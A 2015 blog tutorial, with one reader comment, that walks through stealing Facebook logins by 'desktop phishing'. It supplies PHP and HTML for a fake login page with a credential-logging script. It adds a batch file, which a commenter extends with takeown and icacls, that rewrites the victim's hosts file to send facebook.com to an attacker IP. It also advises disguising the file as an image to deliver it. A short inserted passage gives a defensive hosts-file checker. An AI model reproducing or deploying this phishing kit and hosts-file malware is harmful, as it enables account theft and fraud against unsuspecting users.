Friday, 10 July 2015

Advanced Level Facebook Desktop Phishing Method - 2015 (Undetectable)


As I’ve mentioned in my previous article, in this post we will explore a bit of batch file programming and then apply it to Facebook hacking by desktop phishing. The advantage here is that the victim will not be able to identify the fake page, since the URL in the address bar looks the same as the genuine one. This post also includes new PHP code for making a phishing page that is undetectable and can bypass the security check of a hosting site.

This tutorial is a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing”, I would ask you to read them before continuing, since they give you the prerequisite knowledge of the topics that we are going to discuss today.

Difference between phishing and desktop phishing


In phishing

1. Attacker convinces the victim to click on the link to a fake login page which resembles a genuine login page.

2. Victim enters his credentials in the fake login page, and they go to the attacker.

3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback in phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.


In desktop phishing

1. Attacker sends an executable file to the victim and the victim is supposed to double click on it. Attacker's job is done.

2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn't come to know.

3. The rest is the same as in normal phishing.


What is Hosts File?


The hosts file is a text file containing domain names and the IP addresses associated with them.
Location of the hosts file in Windows: C:\Windows\System32\drivers\etc\. Whenever we visit any website, say www.anything.com, a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.

Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.



What is the attack?


I hope you have got an idea of how modification of the hosts file on the victim's computer can be misused.
We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website / phishing page. Whenever the victim visits the genuine website, he would be directed to our fake login page, and the domain name in the URL box would remain genuine, as typed by the victim. Hence the domain name is spoofed.



Steps to perform attack:


Step 1. Making undetectable phishing page



What you need :

Notepad++ for programming (Download : http://www.notepad-plus-plus.org/download)

Steps :

Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php

<?php
$id = $_GET["id"];
if ($id == "facebookforwindows") {
$myFile = "SoftwareDownload.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}

else{
$myFile1 = "Follow.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>



Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)



<!DOCTYPE html>
<html>
 <head>
  <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." />
  <link rel="stylesheet" href="reset.css" type="text/css" media="screen">
  <link rel="stylesheet" href="style.css" type="text/css" media="screen">

 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>  <script src="script.js" type="text/javascript" charset="utf-8"></script>
  <meta property="fb:admins" content="1146295886" />
 </head>
 <body>
   
  <form action="" method="post">

 <label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label">
  Enter your personal Facebook profile URL:
 </label>

 <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" />
 <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" />
 <p>
  <input type="submit" value="Lookup numeric ID..." class="button-primary">
 </p>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id="description">
  For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page. 
 </p>

</form> 

<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-3361652-13']);
  _gaq.push(['_trackPageview']);
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
 </body>
</html>


3) Copy this code and paste it in a new document and save it as data.php
<?php
header ('Location:https://www.facebook.com/');
$handle = fopen("PassFace.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Facebook For Windows : Welcome</title>
<style type="text/css">
html, body
{
   height: 100%;
}
div#space
{
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   float:left
}
div#container
{
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
}
</style>
<style type="text/css">
body
{
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
}
</style>
<style type="text/css">
h3
{
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
}
a:hover
{
   color: #90F518;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="space"><br></div>
<div id="container">
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;">
<img src="images/Facebook_Box.png" id="Image1" alt="" align="top" border="0" style="width:1093px;height:609px;"></div>
<div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;">
<img src="images/Facebook.png" id="Image2" alt="" align="top" border="0" style="width:168px;height:168px;"></div>
<div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;">
<h3>Download Facebook For Windows :<br>
</h3><font style="font-size:13px" color="#000000" face="Arial">size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
</h3></div>
<div id="Html1" style="position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3">
<b>Login to Donwload this Application :</b><br/>
<form name="input" action="data.php" method="post">
Username : <input type="text" name="username" />
Password : <input type="password" name="password">
<input type="submit" value="Download" action="data.php" method="post"/>
</form></div>
</div>
</body>
</html>
5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put them inside “images”

Image 1 : http://adf.ly/1IK1UU
Image 2 : http://adf.ly/1IK1ah

Now if you followed all the steps carefully, It will look similar to this :


You have successfully created the phishing page, and we need these files in the next steps.


Step 2. Setting up Xampp web server


You can use WAMP or XAMPP; I would recommend XAMPP. This software will help you host the phishing page on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.


S/W : xampp Server

1) First download and install XAMPP on your PC, then start the Apache and MySQL services.


2) Copy the 5 files (including the folder named 'images') we created in step 1, and paste them all into the htdocs folder, which is under XAMPP (the place where you installed XAMPP)
(normally the htdocs folder is at the path: c:\xampp\htdocs)



Step 3. Setting up static vpn

I will use proXPN VPN for this tutorial, but I recommend Strong Open VPN as it is very stable; you can download it from here.

Install proXPN VPN or any other static VPN. I recommend Strong VPN, as it is very stable and gives you a static IP. Once you install and run it, you will get a static IP (VPN).



Now you have a static IP for your localhost.


Step 4. Creating a batch (.bat) file to accomplish replacing the victim's hosts file

Now we have to replace some text in the victim's hosts file, which is at C:\windows\system32\drivers\etc. You can do this in many ways, either by using an SFX archive or a batch file; for this tutorial we will use a batch file to accomplish the job.

Here is the batch program that I was talking about in my last post 'DNS hijacking'. As we have seen, adding an IP address with a corresponding domain name in the hosts file redirects you to the webpage you desire under the desired domain name.

So, we are going to take this to the next level for hacking purposes. We’ll change the hosts file on the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%\System32\drivers\etc\hosts

echo 62.116.159.4 www.facebook.com >> %hostspath%
echo 62.116.159.4 www.fb.com >> %hostspath%
echo 62.116.159.4 https://www.facebook.com >> %hostspath%
echo 62.116.159.4 https://fb.com >> %hostspath%

exit

Replace the IP address (62.116.159.4) with the static IP address of your VPN (the static VPN IP address you got in step 3), and save it as 'anyname.bat'.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of code are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of Facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.
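
A defender-side check for the change this step makes, as an added example that is not part of the original post: it parses a hosts file and flags any entry that pins a watched domain to a non-local address. The watch list, the verdict labels and the sample file are assumptions constructed for the example; the four 62.116.159.4 lines are the ones the batch file above appends.

```python
import ipaddress

# Assumed watch list: names that should only ever be resolved through DNS.
WATCHED = ("facebook.com", "fb.com")
LOCAL_NAMES = {"localhost", "localhost.localdomain"}

def normalize(token):
    """Lower-case a name field and strip a pasted URL scheme, path or port."""
    name = token.lower().split("://", 1)[-1]
    return name.split("/", 1)[0].split(":", 1)[0].rstrip(".")

def audit_hosts(text, watched=WATCHED):
    """Return (line_no, ip, token, verdict) for each non-local hosts entry."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()  # drop comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            findings.append((line_no, fields[0], fields[1], "malformed"))
            continue
        for token in fields[1:]:
            name = normalize(token)
            if name in LOCAL_NAMES:
                continue
            hit = any(name == d or name.endswith("." + d) for d in watched)
            if hit and not (ip.is_loopback or ip.is_unspecified):
                verdict = "redirect"   # watched name pinned to a remote address
            else:
                verdict = "review"     # static override; confirm it is expected
            findings.append((line_no, str(ip), token, verdict))
    return findings

# Constructed sample: default-style entries plus the four lines the batch file appends.
SAMPLE = """\
# Sample HOSTS file (constructed for this example)
127.0.0.1       localhost
::1             localhost
192.168.1.20    nas.home.lan    # benign static override
62.116.159.4 www.facebook.com
62.116.159.4 www.fb.com
62.116.159.4 https://www.facebook.com
62.116.159.4 https://fb.com
"""

if __name__ == "__main__":
    print(*audit_hosts(SAMPLE), sep="\n")
```

On Windows, feed it the contents of %windir%\System32\drivers\etc\hosts. A browser redirected this way still validates the server certificate against the typed name, so an HTTPS site served from the substituted address fails with a certificate error.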



Step 5. Sending the file to victim

You can also change the .bat file into an .exe file using a batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After it is successfully converted to an anyname.exe file, you can do one more step to hide this .exe file in an image file; follow my previous guide:
How To Make A Virus And Hide In An Image File (FUD)

Now send the file via email or upload the file to a site and ask the victim to download the file. After the victim downloads and clicks the file, his hosts file will be replaced. So now whenever the victim enters facebook.com, he will be redirected to our phisher page, but the URL will remain as Facebook.com.

To see all the victim's credentials and passwords, open the newly created log.txt file, which is under the htdocs folder.


You are done.

1 comment :

  1. Hi Friend,

    Well written and well explained. Great work, but here is a little and a big problem: you can't edit the hosts file without administrator privileges. The batch file programming you have mentioned above does not do the job in Windows Vista, 7, 8, 8.1 (I've tried on 8.1). So due to your hard work on this tutorial I decided to help you in this matter. Here is my working code:


    @echo off

    takeown /f C:\Windows\System32\drivers\etc\hosts && icacls C:\Windows\System32\drivers\etc\hosts /grant administrators:F
    set hostspath=%windir%\System32\drivers\etc\hosts

    echo 62.116.159.4 www.facebook.com >> %hostspath%
    echo 62.116.159.4 www.fb.com >> %hostspath%
    echo 62.116.159.4 https://www.facebook.com >> %hostspath%
    echo 62.116.159.4 https://fb.com >> %hostspath%

    exit

    Put it in batch file then convert that batch into exe using Bat to Exe converter (be sure to tick Add Administrator Manifest in Bat to exe converter or it will not work.)

    Download link:
    http://www.f2ko.de/en/b2e.php

    Thank you for your attention.
